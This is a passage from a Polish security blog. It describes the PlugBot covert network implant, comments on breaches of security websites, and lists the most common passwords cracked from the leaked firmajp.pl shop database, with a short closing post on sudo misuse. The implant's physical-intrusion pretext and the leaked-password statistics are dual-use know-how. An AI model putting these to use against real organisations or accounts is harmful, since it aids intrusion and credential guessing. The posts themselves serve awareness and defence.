Wiedzą o tym oczywiście organizacje zatroskane o swe bezpieczeństwo, które starają się w każdy możliwy sposób ograniczyć obcym dostęp do własnej przewodowej oraz bezprzewodowej sieci. W efekcie tego, w skrajnych przypadkach intruz (pentester) znajdujący się poza obiektami należącymi do danej organizacji nie będzie nawet w zasięgu prywatnej sieci WiFi. Tutaj z pomocą może mu jednak przyjść elektroniczny szpieg, czyli właśnie PlugBot.

PlugBot to miniaturowy komputer wyposażony w:

Procesor 1.2 Ghz,
512 MB RAM,
Bluetooth,
Wireless 802.11b,
Gigabit Ethernet,
Slot MicroSD,
system Linux, Perl, PHP, MySQL,
Miniaturową obudowę upodabniającą całe urządzenie do popularnych zasilaczy i ładowarek sieciowych.

Wszystko czego musi dokonać w celu instalacji urządzenia intruz lub pentester podczas krótkotrwałego (np. pod pozorem przeglądu klimatyzacji) dostępu do pomieszczeń danej organizacji, to wetknięcie plugbota do dowolnego gniazdka elektrycznego. W efekcie będziemy mieć do czynienia z następującą sytuacją:

Ponieważ nasz szpieg znajduje się wewnątrz danej organizacji to prawdopodobnie znajdzie się w zasięgu wewnętrznej sieci lokalnej lub też sieci WiFi. Od teraz PlugBot może więc już (na zlecenie intruza lub pentestera) rozpocząć poszukiwania słabych punktów w zabezpieczeniach za pomocą dowolnych (publicznych lub prywatnych) narzędzi.

Jeśli tylko sprzętowemu szpiegowi uda się połączyć z jakąś siecią przewodową lub bezprzewodowa, to natychmiast nawiązane zostanie połączenie z uprzednio skonfigurowanym adresem należącym do centrum sterowania (ang. Central Command) całą operacją. Wszystkie zebrane przez PlugBota wyniki są natomiast wysyłane szyfrowanym połączeniem do centrum składowania danych (ang. Drop Zone). Oczywiście intruz lub pentester, poprzez centrum sterowania, na bieżąco może śledzić wszystkie wyniki oraz sterować dalszymi poczynaniami szpiega.

Projekt PlugBot jest obecnie nadal w fazie rozwoju. Między innymi rozwijane jest obecnie oprogramowanie mające służyć za centrum sterowania. Jeśli chcielibyście wesprzeć prace nad tym interesującym sprzętowym szpiegiem, możecie po prostu zostać sponsorem projektu. Ja zaś jestem ciekaw, czy uważacie, że tego typu sprzętowe rozwiązania mają szansę zrewolucjonizować ataki na systemy informatyczne oraz poczciwe testy penetracyjne?

Bezpiecznego Nowego Roku!

2011-01-01T00:32:00.002+01:00

Bezpiecznego Nowego Roku...

życzy wszystkim czytelnikom...

W szczególności życzę Wam, by wszystkie ważne łatki zawsze zostały zaaplikowane na czas, by centralne firewalle i systemy anty-X zawsze były w stanie wychwycić wszelkie zagrożenia zanim te dotrą do stacji roboczych i serwerów oraz by brak jakichkolwiek incydentów bezpieczeństwa był zawsze wynikiem... odpowiednio skutecznych zabezpieczeń!

Zależność haseł od tematyki serwisu internetowego

2010-12-26T16:17:00.011+01:00

Czy istnieje serwis internetowy całkowicie odporny na wszelkie próby naruszenie jego bezpieczeństwa? Oczywiście nie. W ciągu ostatnich dni przekonali się o tym m.in. administratorzy bardzo popularnych serwisów (exploit-db.com, backtrack-linux.org, free-hack.com) poświęconych tematyce bezpieczeństwa, które zostały skutecznie zaatakowane. Szczegóły dotyczące poszczególnych ataków zostały upublicznione w drugim wydaniu [EZINE] Owned and Exposed. Wszystkich zainteresowanych szczegółami zachęcam do powyższej lektury, my natomiast zajmiemy się dzisiaj tematem nieco odmiennym.

Analizując informacje opublikowane na temat skutecznych ataków na wspomniane znane serwisy internetowe związane z tematyką bezpieczeństwa informatycznego i hackingu, możemy natrafić na wiele bardzo interesujących informacji. Intrygujący jest przykładowo fakt zbierania i rejestrowania adresów IP należących do internautów odwiedzających serwis backtrack-linux.org:

// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!
function getRealIpAddr()
{
   if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet
   {
   $ip=$_SERVER['HTTP_CLIENT_IP'];
   }
   elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy
   {
   $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
   }
   else
   {
   $ip=$_SERVER['REMOTE_ADDR'];
   }
   return $ip;
}

Poza tym happy ninjas twierdzą, że niemożliwe jest skuteczne zabezpieczenie systemu (~~Linuksa?~~ FreeBSD? Systemu Carders.cc?) zawierającego... backdoora:

It's hard to harden a system [~~Linux?~~ FreeBSD? "Carder.cc box"?] when everything is backdoored and unfortunately we are just too ninja to get stopped by your silly protections. You can never stop us. We will always keep owning and exp0sing you.

Jestem ciekaw, co myślicie na temat tej sugestii?

Bardziej szczegółowo zajmiemy się dziś natomiast przypadkiem ataku na jeden z naszych rodzimych serwisów, sklep internetowy firmajp.pl. Otóż w ostatnim czasie doszło do skutecznego ataku na ten serwis oferujący ubrania i gadżety dla młodzieży utożsamiającej się z ideałami JP/HWDP. Intruzowi udało się m.in. wejść w posiadanie bazy danych serwisu, która następnie została udostępniona w sieci.

Jeden z czytelników (podziękowania dla agilobable) HCSL pokusił się natomiast o odzyskanie sporej ilości (5268) haseł ze skrótów zapisanych w tejże bazie, dzięki czemu możemy przedstawić listę najpopularniejszych haseł stosowanych przez użytkowników tegoż nietypowego sklepu (hasło - ilość wystąpień):

firmajp - 79
firma - 44
123456 - 44
polska lub polska1 - 42
jebacpolicje - 31
prosto - 27
chwdp lub chwdp1 - 23
zaq12wsx - 19
cracovia - 17
qwerty - 15

Użytkownikom serwisu firmajp.pl przypominamy, że obecnie każdy może być w posiadaniu wspomnianej bazy, wobec czego należy jak najszybciej zmienić wszystkie hasła identyczne lub podobne, do tych użytych w ramach sklepu JP. Zaś osoby zainteresowana tematyką praktycznego testowania bezpieczeństwa haseł z pewnością już zauważyły kilka interesujących prawidłowości.

Powyższa statystyka haseł oczywiście potwierdza to, że użytkownicy serwisów internetowych bardzo często wybierają hasła proste do złamania lub nawet odgadnięcia. Powyższy przykład potwierdza również to, że hasła tworzone przez internautów bardzo często charakteryzują się pewnymi określonymi wzorcami (takimi jak pojedyncza cyfra dodawana na końcu frazy uwierzytelniającej, najczęściej zaś jest to cyfra "1").

Poza tym, powyższy przykład świetnie obrazuje również to, że hasła użytkowników są bardzo często zależne od tematyki, a nawet samej nazwy serwisu lub systemu informatycznego. Bardzo dobrze wiedzą o tym komputerowi przestępcy oraz pentesterzy, dlatego też chcąc utworzyć hasło trudne do złamania, należy zawsze unikać jakichkolwiek nawiązań do samego serwisu oraz jego przeznaczenia. Najlepiej zaś do czasu upowszechnienia się innych obiecujących metod uwierzytelniania, opracować jakiś własny system tworzenia silnych i unikalnych haseł.

Czym grozi nieuprawnione użycie sudo? [Have a safe Xmas!]

2010-12-25T16:29:00.003+01:00

Sudo to popularny program obecny w rozmaitych systemach operacyjnych Linux i Unix, stosowany najczęściej w celu delegowania uprawnień administracyjnych na poszczególnych użytkowników systemu. Możliwość korzystania z tego przydatnego narzędzia konfigurujemy zazwyczaj poprzez umieszczenie odpowiednich wpisów w pliku /etc/sudoers, określając w ten sposób które programy poszczególni użytkownicy mogą za pomocą sudo uruchamiać. Czy zastanawialiście się jednak, co się tak naprawdę dzieje, gdy próbujecie za pomocą sudo uzyskać nienależne wam uprawnienia?

Oczywiście próba uzyskania nienależnych uprawnień może narazić nas na surowe konsekwencje:

Abstrahując od świątecznych żartów, taki przypadek może być w danej organizacji rzeczywiście uznawany za incydent bezpieczeństwa, zaś za monitorowanie tego typu zdarzeń odpowiedzialny będzie najprawdopodobniej zespół zajmujący się tak zwanym aktywnym monitoringiem bezpieczeństwa.

Jestem ciekaw, czy wiecie, kto w waszej organizacji zajmuje się monitoringiem tego typu zdarzeń, jeśli oczywiście aktywny monitoring jest w ogóle prowadzony? Jeśli macie jakieś interesujące wspomnienia związane z podobnymi przypadkami i incydentami, jak zwykle zachęcam do podzielenia się nimi ze wszystkimi czytelnikami za pomocą komentarzy!

[źródło]